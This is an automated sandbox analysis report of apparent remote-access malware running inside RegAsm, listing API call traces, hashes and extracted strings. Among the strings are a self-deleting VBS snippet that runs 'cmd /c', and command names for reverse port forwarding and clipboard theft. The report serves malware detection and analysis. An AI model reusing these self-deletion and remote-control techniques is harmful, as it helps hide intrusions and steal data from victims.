                                                                                                                                        • Instruction Fuzzy Hash: CCB1A1316083409BC314FB26C941AAFB7E5AFC4358F40492FF589622D2EF789945CB8B
                                                                                                                                        APIs
                                                                                                                                        • ___free_lconv_mon.LIBCMT ref: 0045138A
                                                                                                                                          • Part of subcall function 00450582: _free.LIBCMT ref: 0045059F
                                                                                                                                          • Part of subcall function 00450582: _free.LIBCMT ref: 004505B1
                                                                                                                                          • Part of subcall function 00450582: _free.LIBCMT ref: 004505C3
                                                                                                                                          • Part of subcall function 00450582: _free.LIBCMT ref: 004505D5
                                                                                                                                          • Part of subcall function 00450582: _free.LIBCMT ref: 004505E7
                                                                                                                                          • Part of subcall function 00450582: _free.LIBCMT ref: 004505F9
                                                                                                                                          • Part of subcall function 00450582: _free.LIBCMT ref: 0045060B
                                                                                                                                          • Part of subcall function 00450582: _free.LIBCMT ref: 0045061D
                                                                                                                                          • Part of subcall function 00450582: _free.LIBCMT ref: 0045062F
                                                                                                                                          • Part of subcall function 00450582: _free.LIBCMT ref: 00450641
                                                                                                                                          • Part of subcall function 00450582: _free.LIBCMT ref: 00450653
                                                                                                                                          • Part of subcall function 00450582: _free.LIBCMT ref: 00450665
                                                                                                                                          • Part of subcall function 00450582: _free.LIBCMT ref: 00450677
                                                                                                                                        • _free.LIBCMT ref: 0045137F
                                                                                                                                          • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                                                                          • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                                                        • _free.LIBCMT ref: 004513A1
                                                                                                                                        • _free.LIBCMT ref: 004513B6
                                                                                                                                        • _free.LIBCMT ref: 004513C1
                                                                                                                                        • _free.LIBCMT ref: 004513E3
                                                                                                                                        • _free.LIBCMT ref: 004513F6
                                                                                                                                        • _free.LIBCMT ref: 00451404
                                                                                                                                        • _free.LIBCMT ref: 0045140F
                                                                                                                                        • _free.LIBCMT ref: 00451447
                                                                                                                                        • _free.LIBCMT ref: 0045144E
                                                                                                                                        • _free.LIBCMT ref: 0045146B
                                                                                                                                        • _free.LIBCMT ref: 00451483
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 161543041-0
                                                                                                                                        • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                                                                                        • Instruction ID: 2428002f6fd8eb1a99257b9b861ac38f7c05b5b97acacff09fd9d8cf260fe807
                                                                                                                                        • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                                                                                        • Instruction Fuzzy Hash: 403193715003009FEB20AA39D846F5B73E8EF02315F62992FE849D7662DF78AD44C729
                                                                                                                                        APIs
                                                                                                                                        • ___free_lconv_mon.LIBCMT ref: 10007D06
                                                                                                                                          • Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
                                                                                                                                          • Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
                                                                                                                                          • Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
                                                                                                                                          • Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
                                                                                                                                          • Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
                                                                                                                                          • Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
                                                                                                                                          • Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
                                                                                                                                          • Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
                                                                                                                                          • Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
                                                                                                                                          • Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
                                                                                                                                          • Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
                                                                                                                                          • Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
                                                                                                                                          • Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF
                                                                                                                                        • _free.LIBCMT ref: 10007CFB
                                                                                                                                          • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                                          • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                        • _free.LIBCMT ref: 10007D1D
                                                                                                                                        • _free.LIBCMT ref: 10007D32
                                                                                                                                        • _free.LIBCMT ref: 10007D3D
                                                                                                                                        • _free.LIBCMT ref: 10007D5F
                                                                                                                                        • _free.LIBCMT ref: 10007D72
                                                                                                                                        • _free.LIBCMT ref: 10007D80
                                                                                                                                        • _free.LIBCMT ref: 10007D8B
                                                                                                                                        • _free.LIBCMT ref: 10007DC3
                                                                                                                                        • _free.LIBCMT ref: 10007DCA
                                                                                                                                        • _free.LIBCMT ref: 10007DE7
                                                                                                                                        • _free.LIBCMT ref: 10007DFF
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.874234704.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.874229194.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.874234704.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 161543041-0
                                                                                                                                        • Opcode ID: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                                                                                        • Instruction ID: 6de9b84f5b51ee4e35cbeb1ed48e08772f21b212059d2ac72beb9c863e9ed859
                                                                                                                                        • Opcode Fuzzy Hash: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                                                                                        • Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 0041A04A
                                                                                                                                        • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 0041A07C
                                                                                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A108
                                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 0041A18E
                                                                                                                                        • GetLocalTime.KERNEL32(?), ref: 0041A196
                                                                                                                                        • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A285
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                                                                        • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                                                                                                                                        • API String ID: 489098229-1431523004
                                                                                                                                        • Opcode ID: a9a564c4fa78c27a57715e2126324e45245b8a766e259b72a025c3b0d3967f40
                                                                                                                                        • Instruction ID: 12d64888f2a2aa40a87de1a625a26b3edd7a2139bf4817292c9f8cf1352d8a2d
                                                                                                                                        • Opcode Fuzzy Hash: a9a564c4fa78c27a57715e2126324e45245b8a766e259b72a025c3b0d3967f40
                                                                                                                                        • Instruction Fuzzy Hash: 7A517D70A002159ACB14BBB5C8529FD77A9AF54308F40407FF509AB1E2EF7C9D85C799
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                                                                          • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                                                                          • Part of subcall function 00413733: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 0041374F
                                                                                                                                          • Part of subcall function 00413733: RegQueryValueExA.KERNEL32 ref: 00413768
                                                                                                                                          • Part of subcall function 00413733: RegCloseKey.KERNEL32(00000000), ref: 00413773
                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D894
                                                                                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D9F3
                                                                                                                                        • ExitProcess.KERNEL32 ref: 0040D9FF
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                                                                        • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                                                                                        • API String ID: 1913171305-3159800282
                                                                                                                                        • Opcode ID: 8db7f9089fcdac6088c6dca5af5b566ceab7d3a4e33a82e448366c6afc64066d
                                                                                                                                        • Instruction ID: 6f299f75ad759bd4c56b3f4cab90e5e1fe41ff60d22e8747b975e3d2bb757992
                                                                                                                                        • Opcode Fuzzy Hash: 8db7f9089fcdac6088c6dca5af5b566ceab7d3a4e33a82e448366c6afc64066d
                                                                                                                                        • Instruction Fuzzy Hash: 9B4129719001155ACB15FBA2DC56DEEB778AF50709F10017FB10AB21E2FF785E8ACA98
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 269201875-0
                                                                                                                                        • Opcode ID: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                                                                                                                        • Instruction ID: 80ca3ff3fa16d46db3e6ae4c9b8471dba03f652ca918f9f25067e0b92ee87d4d
                                                                                                                                        • Opcode Fuzzy Hash: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                                                                                                                        • Instruction Fuzzy Hash: 30C183B6D40204ABEB20DBA9CC43FDE77F8AB09705F150166FE04EB283D6B49D459768
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00455929: CreateFileW.KERNEL32(00000000,00000000,?,00455D04,?,?,00000000), ref: 00455946
                                                                                                                                        • GetLastError.KERNEL32 ref: 00455D6F
                                                                                                                                        • __dosmaperr.LIBCMT ref: 00455D76
                                                                                                                                        • GetFileType.KERNEL32 ref: 00455D82
                                                                                                                                        • GetLastError.KERNEL32 ref: 00455D8C
                                                                                                                                        • __dosmaperr.LIBCMT ref: 00455D95
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00455DB5
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00455EFF
                                                                                                                                        • GetLastError.KERNEL32 ref: 00455F31
                                                                                                                                        • __dosmaperr.LIBCMT ref: 00455F38
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                        • String ID: H
                                                                                                                                        • API String ID: 4237864984-2852464175
                                                                                                                                        • Opcode ID: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                                                                                                        • Instruction ID: 7cd045c9b8f196398d23f94ba58010557f508cd7b58f44c29b3e784ccbbfb847
                                                                                                                                        • Opcode Fuzzy Hash: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                                                                                                        • Instruction Fuzzy Hash: 44A14532A106049FDF19AF68DC657BE3BA0EB06325F24015EEC11AB392D6398D1AC759
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free
                                                                                                                                        • String ID: \&G$\&G$`&G
                                                                                                                                        • API String ID: 269201875-253610517
                                                                                                                                        • Opcode ID: 4c79e0627c8f19053a14b01c9d065665146560bb3788e30f1103ba49badb8175
                                                                                                                                        • Instruction ID: 59c4f5d9f803fa3be21c2588ad204ea2c1e8261bb9e1a4607c4596bf86990b35
                                                                                                                                        • Opcode Fuzzy Hash: 4c79e0627c8f19053a14b01c9d065665146560bb3788e30f1103ba49badb8175
                                                                                                                                        • Instruction Fuzzy Hash: 86610E75900205AFDB21DF69C842B9ABBF4EF06710F24426BED44EB242E774AD45CB58
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 65535$udp
                                                                                                                                        • API String ID: 0-1267037602
                                                                                                                                        • Opcode ID: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                                                                                                                        • Instruction ID: a9902b4e2b63063b067a15c036b171ad6d3a8658db747517b03e91dd9f9ead29
                                                                                                                                        • Opcode Fuzzy Hash: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                                                                                                                        • Instruction Fuzzy Hash: FB51D431605301ABDB609B14E905BFB77E8ABC5754F08042FF88597390E76CCCC1969E
                                                                                                                                        APIs
                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A912
                                                                                                                                        • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A91F
                                                                                                                                        • __dosmaperr.LIBCMT ref: 0043A926
                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A952
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A95C
                                                                                                                                        • __dosmaperr.LIBCMT ref: 0043A963
                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A9A6
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A9B0
                                                                                                                                        • __dosmaperr.LIBCMT ref: 0043A9B7
                                                                                                                                        • _free.LIBCMT ref: 0043A9C3
                                                                                                                                        • _free.LIBCMT ref: 0043A9CA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2441525078-0
                                                                                                                                        • Opcode ID: 289d0842b92f941f4feb2be478b72c6b1387c4c53bdf58ebb9c1b022d59fa5b6
                                                                                                                                        • Instruction ID: 3a2165a63a30732921e8d6571a772c998230e0148124485b419b79488018c54b
                                                                                                                                        • Opcode Fuzzy Hash: 289d0842b92f941f4feb2be478b72c6b1387c4c53bdf58ebb9c1b022d59fa5b6
                                                                                                                                        • Instruction Fuzzy Hash: 8631D5B180420AFBDF01AFA5CC45EAF3B6CEF09324F11451AF950662A1DB38CD61DB66
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Eventinet_ntoa
                                                                                                                                        • String ID: I6$GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                                                                                                                        • API String ID: 3578746661-369977117
                                                                                                                                        • Opcode ID: 57d06d6c52dfeba4092ae4aaac0bc016092a07c4d064bf56e84e87d0b32c376f
                                                                                                                                        • Instruction ID: 5b49fc9f60f15aadef5e91219dcc0d557585a55aed20fbc46105045b647f8dc0
                                                                                                                                        • Opcode Fuzzy Hash: 57d06d6c52dfeba4092ae4aaac0bc016092a07c4d064bf56e84e87d0b32c376f
                                                                                                                                        • Instruction Fuzzy Hash: 5351D531A042015BC714FB36D95AAAE36A5AB84344F40453FFA06676F2EF7C8985C7CE
                                                                                                                                        APIs
                                                                                                                                        • SetEvent.KERNEL32(?,?), ref: 004054BF
                                                                                                                                        • GetMessageA.USER32 ref: 0040556F
                                                                                                                                        • TranslateMessage.USER32(?), ref: 0040557E
                                                                                                                                        • DispatchMessageA.USER32(?), ref: 00405589
                                                                                                                                        • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,0000003B), ref: 00405679
                                                                                                                                          • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                                                                        • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                                                                        • API String ID: 2956720200-749203953
                                                                                                                                        • Opcode ID: ae46a6569c745e6d1fd2afb5fc3760f956382d9b8c2f314a1c5e4999f61ed837
                                                                                                                                        • Instruction ID: d37e718accd843302ceacc2187c81124e04698433963f5de03abd71ab6b9016f
                                                                                                                                        • Opcode Fuzzy Hash: ae46a6569c745e6d1fd2afb5fc3760f956382d9b8c2f314a1c5e4999f61ed837
                                                                                                                                        • Instruction Fuzzy Hash: 39419071A04301ABCB14FB76DC5A86F37A9AB85704F40493EF516A31E1EF3C8905CB9A
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00417F67: __EH_prolog.LIBCMT ref: 00417F6C
                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660B4), ref: 00417E17
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00417E20
                                                                                                                                        • DeleteFileA.KERNEL32(00000000), ref: 00417E2F
                                                                                                                                        • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DE3
                                                                                                                                          • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                                                                                                        • String ID: 0VG$0VG$<$@$Temp
                                                                                                                                        • API String ID: 1704390241-2575729100
                                                                                                                                        • Opcode ID: 56381d62612dfaeda6f40a421600c7779e16d03d52b50a481ca23e24a9b19417
                                                                                                                                        • Instruction ID: 01f79aac078c9204ae4226344def03f9678a0966abb138ad227abf0e83d93267
                                                                                                                                        • Opcode Fuzzy Hash: 56381d62612dfaeda6f40a421600c7779e16d03d52b50a481ca23e24a9b19417
                                                                                                                                        • Instruction Fuzzy Hash: 18417E319002099ACB14FB62DC56AEE7735AF00318F50417EF50A761E1EF7C5A8ACB99
                                                                                                                                        APIs
                                                                                                                                        • OpenClipboard.USER32 ref: 0041697C
                                                                                                                                        • EmptyClipboard.USER32 ref: 0041698A
                                                                                                                                        • CloseClipboard.USER32 ref: 00416990
                                                                                                                                        • OpenClipboard.USER32 ref: 00416997
                                                                                                                                        • GetClipboardData.USER32 ref: 004169A7
                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                                                                                                        • CloseClipboard.USER32 ref: 004169BF
                                                                                                                                          • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                                                                        • String ID: !D@
                                                                                                                                        • API String ID: 2172192267-604454484
                                                                                                                                        • Opcode ID: b64630acea7acae9f4b6bf79d34c0e4f1fbb3b6ac899b568f0dd2c6f733c1b32
                                                                                                                                        • Instruction ID: c3dc955394dadbf9cb8fa72aed918e4e170398eafb94270add22466952777bd7
                                                                                                                                        • Opcode Fuzzy Hash: b64630acea7acae9f4b6bf79d34c0e4f1fbb3b6ac899b568f0dd2c6f733c1b32
                                                                                                                                        • Instruction Fuzzy Hash: AA014C31204301EFC714BB72DC49AAE7BA5AF88742F40047EF906861E2DF388C45C659
                                                                                                                                        APIs
                                                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABAD
                                                                                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABC4
                                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABD1
                                                                                                                                        • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABE0
                                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF1
                                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 221034970-0
                                                                                                                                        • Opcode ID: 77d1dba04074bb5c0b27b9b0f176deadcb724c45256b7ec0605674b85678f877
                                                                                                                                        • Instruction ID: a7ddf6af562b27afc3fdb57d9320cc893b1711f81dd6882f7bac22400d97ef93
                                                                                                                                        • Opcode Fuzzy Hash: 77d1dba04074bb5c0b27b9b0f176deadcb724c45256b7ec0605674b85678f877
                                                                                                                                        • Instruction Fuzzy Hash: 1411E931501218BFD711AF64DC85CFF3B6CDB41B66B000426FA0692191EB689D46AAFA
                                                                                                                                        APIs
                                                                                                                                        • _free.LIBCMT ref: 004481B5
                                                                                                                                          • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                                                                          • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                                                        • _free.LIBCMT ref: 004481C1
                                                                                                                                        • _free.LIBCMT ref: 004481CC
                                                                                                                                        • _free.LIBCMT ref: 004481D7
                                                                                                                                        • _free.LIBCMT ref: 004481E2
                                                                                                                                        • _free.LIBCMT ref: 004481ED
                                                                                                                                        • _free.LIBCMT ref: 004481F8
                                                                                                                                        • _free.LIBCMT ref: 00448203
                                                                                                                                        • _free.LIBCMT ref: 0044820E
